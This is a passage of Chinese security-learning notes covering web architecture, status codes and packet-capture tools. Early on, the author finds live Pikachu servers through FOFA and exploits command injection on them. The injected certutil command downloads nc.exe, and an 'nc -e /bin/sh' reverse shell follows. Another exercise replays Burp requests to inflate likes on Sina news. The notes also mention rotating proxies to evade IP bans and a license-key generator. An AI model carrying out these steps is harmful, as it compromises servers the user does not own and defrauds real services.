安全基础~信息收集1

文章目录

  • 常见名词
    • 小实战
  • 网站搭建
    • 小实战
    • 抓包模拟器
    • 状态码返回值
    • 网站搭建
    • WEB应用安全漏洞
  • 数据包&封包&信息收集
    • **参考点**

常见名词

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,

反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

名词解释

小实战

  • fofa暗网浏览器中,使用"pikachu" && country="CN" && title="Get the pikachu"命令,查询在线pikachu服务器,进入测试命令执行漏洞

    安全基础~信息收集1_第1张图片

  • 执行命令,查看回显

    安全基础~信息收集1_第2张图片

  • 查看本机是哪种服务器,接着使用下载命令,将远程连接nc下载到本地,并命名为n.exe
    文档下载命令转换

    eg

  • 选择CMD下载命令,复制命令,使用命令执行127.0.0.1 & certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe,出现以下,表示下载完成,也可以使用dir查看
    安全基础~信息收集1_第3张图片
    安全基础~信息收集1_第4张图片

  • 接着在想要反弹shell的电脑上使用命令 nc -lvvp 端口号(5566)监听端口;在肉机上用nc -e /bin/sh(或cmd) 目标ip 5566;成功连接上远端服务器。
    安全基础~信息收集1_第5张图片

网站搭建

Web应用&架构搭建&漏洞概念&HTTP

Web应用&架构
理解不同WEB应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等
开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等
中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服务器操作系统:Windows系列,Linux系列,Mac系列等
第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等

小实战

一个好玩的东西,新浪新闻点赞,在不登陆的情况下只能点赞一次,究其原因应该是浏览器前端问题,可以刷新页面继续点赞,也可以截取数据包,多次发送就能解决仅能发送一次的问题。

  • 已经点赞后,无论如何去点都无法再次增加点赞量,此时的点赞量为229。

安全基础~信息收集1_第6张图片

  • 开启burpsuite抓包,并右键送至中继器(repeater)
    安全基础~信息收集1_第7张图片

  • 关闭抓包,在repeater中继续send数据包,刷新网页查看点赞量,此时的点赞量已经到了250次了。
    安全基础~信息收集1_第8张图片

抓包模拟器

在PC端显现出来的浏览器与手机端浏览器显现出来的不同,使用burpsuite抓包,观看数据包的区别。

  • burpsuite中配置代理,其中127是本地浏览器抓包,10是对该计算机局域网内进行抓包(特指模拟器)
    安全基础~信息收集1_第9张图片
  • 模拟器更改配置,代理--手动代理服务器主机名改为本机IP地址,dialing端口与上述一致,为8888,如下:
    安全基础~信息收集1_第10张图片
  • 分别在PC端与模拟器上抓包,让数据流经burp抓包工具,如下:
    安全基础~信息收集1_第11张图片

通过User-Agent可知其发生差异的原因

状态码返回值

参考文章1
参考文章2
400:发送请求有语法错误
403:文件夹存在,没有权限访问
404:访问资源不存在(文件/文件夹)
3xx:跳转,处置过程,判断可有可无
    重定向(302)
5xx:内部错误,服务器问题,判断可有可无
    500.服务器内部异常
    504.服务器请求超时,没有返回结果

在对目标进行扫描时,尽量勾选它们,为了不放过任何结果,需要进行扫描
购买快代理,可以随时更换ip,防止ip被封禁,也可以实现VPN的功效。

网站搭建

安装的前提条件:

  • 拥有一台自己的服务器和属于自己的域名(域名要进行备案,如果不备案只能在大陆之外进行访问)
  • 服务器安装宝塔集成环境,方便操作使用
  • 选用远程连接工具,可以使用Windows自带的远程连接,也可以使用FinalShell进行连接,在远程服务器上进行操作

选择安装
选用Windows搭建:

  • 使用远端mstsc进行搭建,域名没有在国内备案,在阿里云选用大陆之外的云服务器
    选用按量收费,双核4G,服务器选用Windows版本
    安全基础~信息收集1_第12张图片
  • 确认下单之后,配置安全组,配置服务器密码,这些后期都能进行配置
    安全基础~信息收集1_第13张图片
  • 在服务器上下载宝塔,需要注册,在域名处提前配置好,将域名访问映射到服务器的ip,宝塔账号密码是随机的
    安全基础~信息收集1_第14张图片
  • 直接关掉该页面,会出现控制面板工具,复制面板地址到本机浏览器,开始网站的部署。
    安全基础~信息收集1_第15张图片
  • 进入以下界面,可以选择傻瓜式安装,也可以自己进行配置安装,在软件商店中选择。
    安全基础~信息收集1_第16张图片
    Win参考连接
    Linux参考连接

WEB应用安全漏洞

Web应用安全漏洞分类
SQL注入,文件安全,RCE执行,XSS跨站,CSRF/SSRF/CRLF,
反序列化,逻辑越权,未授权访问,XXE/XML,弱口令安全等

安全漏洞解释

数据包&封包&信息收集

参考连接

抓包的意义:     在我们安全测试中,对方可能会提供相对应的ip 地址,域名等等,那么有的应用是不会给你的,当在你测试的时候是不知道对方的目标名字什么的,那么我们就可以通过抓取数据包来获得你想要的信息,例如,对方主机/ip,或者与其相关的信息。

抓包的对象: 那么抓包他主要是针对协议去抓取的,根据不同的协议配对不同的抓包工具,就好比我们的网站他可以用BURP抓包工具,那么我们的APP或者小程序,它就不行了我们的BURP就抓取不到,为什么,因为我们的APP/小程序他走的不是HTTP协议的,所有抓取不到。

抓包的协议:     抓包的协议呢,就是我们的APP,它也可以是HTTP协议的走向,因为我们的HTML5就能做出APP,那么我们HTML5他的走向协议就是http协议,那个APP点开其实就是打开网站了,你留心可以发现,网站有一些网站和我们点开APP十分像

抓包的支持:     其实就是目标他支持哪些抓包工具,支持哪些协议

封包的意义:     封包他就能自定义我们的一个数据包,封包技术说简单也不简单,就是将一系列操作封装为数据包,方便使用,很多我们的外挂都用到封包技术,就相当于说你自定义一个数据包封装发送给服务器

参考点

Fiddler:
    是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件)。 Fiddler 要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。

手机证书安装,需要将防火墙关闭,安装证书步骤参考
安全基础~信息收集1_第17张图片

Charles:
    是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括request, response和HTTP headers (包含cookies与caching信息)。

    在模拟器中添加证书,help -->SSLproxying --> save Charles root certificate,保存之后,在模拟器中保存到文件夹中,接着设置-安全-(加密与凭据)用户凭据-从存储设备安装 / 设置-WALN-更多WALN设置-安装证书,接着会让输入密码,安装就能抓包。

抓取的包全部出现unknow的解决方法
proxy --> SSL Proxying Settings --> Add
来添加主机和端口,
如果个别情况出现unknow,可能是本身抓包软件存在个别漏抓问题。可以忽略
安全基础~信息收集1_第18张图片安全基础~信息收集1_第19张图片
工具栏
从左到右分别为:

(1)清除当前会话
(2)开始记录
(3)开启SSL代理
(4)开始限流/停止限流
(5)开始断点/停止断点
(6)根据所写内容撰写新请求
(7)重发选定请求
(8)工具
(9)设置

Charles 激活码在线计算器
ios配置代理
ios下载证书问题
burp+逍遥模拟器 app抓包

TCPDump:
    是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

BurpSuite:
    是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Wireshark:
    是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

WireShark使用教程

科来网络分析系统:
    是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

WPE&封包分析:
    是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。

封包拦截器
封包监听工具

Charles (茶杯)
https://blog.csdn.net/weixin_45459427/article/details/108393878

Fidder
https://blog.csdn.net/weixin_45043349/article/details/120088449

BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491

你可能感兴趣的:(安全学习,安全)